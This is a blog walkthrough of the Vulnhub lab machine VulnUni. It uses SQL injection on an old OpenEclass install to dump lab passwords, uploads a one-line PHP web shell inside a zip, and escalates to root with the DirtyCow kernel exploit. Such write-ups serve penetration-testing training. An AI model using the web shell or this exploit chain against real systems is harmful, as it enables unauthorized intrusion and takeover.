---
title: "Walkthrough Vulnhub: VulnUni"
date: 2020-06-29T22:06:22+02:00
draft: false
toc: true
images:
tags:
- vulnhub
- walkthrough
- pentest
- beginner
---

## Introduction

[Vulnuni](https://www.vulnhub.com/entry/vulnuni-101,439/) is a linux boot2root machine. This machine is realistic without any CTF elements and pretty straight forward.

Difficulty: Easy

## Recon

We start right away with a **netdiscover** to find the network address of the machine.

{{< image src="../../posts-img/vulnhub-vulnuni1/netdiscover.png" alt="Netdisover" position="center" style="border-radius: 2px;" >}}

Let's scan the machine's ports with **nmap**.

{{< image src="../../posts-img/vulnhub-vulnuni1/nmap.png" alt="Nmap" position="center" style="border-radius: 2px;" >}}

Only the port 80 is open with Apache 2.2.22 and the operating system seems to be Ubuntu.

## Web exploitation

Here's the first web page, we can already see the email address of the administrator.

{{< image src="../../posts-img/vulnhub-vulnuni1/webapp.png" alt="Web App" position="center" style="border-radius: 2px;" >}}

A link is hidden in the source code comments of another page.

{{< image src="../../posts-img/vulnhub-vulnuni1/sourcecode.png" alt="Source code" position="center" style="border-radius: 2px;" >}}

Let's check it out!

{{< image src="../../posts-img/vulnhub-vulnuni1/hiddenpage.png" alt="Hidden page" position="center" style="border-radius: 2px;" >}}

After clicking on the login button we come across the login page of [GUnet OpenEclass](https://eclass.gunet.gr/).

{{< image src="../../posts-img/vulnhub-vulnuni1/eclass.png" alt="Eclass login" position="center" style="border-radius: 2px;" >}}

By going to the about page from the menu, we get the version.

> Platform version is: 1.7.2

We get 2 exploits corresponding to this version.
Both of these exploits ([48163](https://www.exploit-db.com/exploits/48163) and [48106](https://www.exploit-db.com/exploits/48106)) are about SQL injection.

Thanks to **sqlmap** we dump the whole database containing the users and their passwords in clear text. :satisfied:

{{< image src="../../posts-img/vulnhub-vulnuni1/sqlmap.png" alt="Sqlmap" position="center" style="border-radius: 2px;" >}}

Here's what we get.

| username | password     |
|----------|--------------|
| admin    | ilikecats89  |
| garris.e | hf74nd9dmw   |
| perez.s  | i74nw02nm3   |
| smith.j  | smith.j.1971 |

Now that we are admin, we have to look for a way to execute commands on the machine.

We can upload php files to multiple locations on the site. But each time they were transformed into a text file except at http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php.

{{< image src="../../posts-img/vulnhub-vulnuni1/uploadphpfile.png" alt="PHP upload" position="center" style="border-radius: 2px;" >}}

Here we can upload zip archives from which their content is extracted at http://vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/.

So, I tried to upload a simple php file named _reverse.php_ that allows you to execute command.
Before uploading, I have to add it in a zip archive.


Content of _reverse.php_:
```php
<?php
	echo system($_GET['cmd']);
?>
```

The directory listing was enabled.

{{< image src="../../posts-img/vulnhub-vulnuni1/phplisting.png" alt="Directory listing" position="center" style="border-radius: 2px;" >}}

Let's try it !

{{< image src="../../posts-img/vulnhub-vulnuni1/reversephp.png" alt="PHP Reverse shell" position="center" style="border-radius: 2px;" >}}

And yes ! We got a remote code execution.

## Privilege escalation

As www-data we can read the user flag.

```sh
$ ls /home
vulnuni
$ ls /home/vulnuni
Desktop
...
flag.txt
$ cat /home/vulnuni/flag.txt
68fc668278d9b0d6c3b9dc100bee181e
```

Time to get root !

After a little research there are no big configuration problems that would allow us to be root. However, the kernel version and the distribution are old, let's look for exploits associated with these versions.

```sh
$ uname -a   
Linux vulnuni 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ lsb_release -a
Distributor ID:	Ubuntu
Description:	Ubuntu 12.04.4 LTS
Release:	12.04
Codename:	precise
No LSB modules are available.
```

For this we will use [linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh).


```sh
$ bash linux-exploit-suggester.sh
...
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
...
```

This machine seems to be vulnerable to DirtyCow. This exploit allows us to write on any file, even read-only file owned by root.

You can find more information about this exploit [here](https://invidio.us/watch?v=kEsshExn7aE) and how to use it [here](https://invidio.us/watch?v=Lj2YRCXCBv8).

I used the [pokemon](https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c) exploit, which is the non-automated version of [dirtycow 2](https://www.exploit-db.com/exploits/40839).

Let's exploit this !

_First terminal_
{{< image src="../../posts-img/vulnhub-vulnuni1/etc_passwd.png" alt="etc password" position="center" style="border-radius: 2px;" >}}

_Second terminal_
{{< image src="../../posts-img/vulnhub-vulnuni1/su_root.png" alt="su root" position="left" style="border-radius: 2px;" >}}

And we got the flag !!

{{< image src="../../gif/yesss.gif" alt="GIF Victory" position="left" style="border-radius: 2px;" >}}
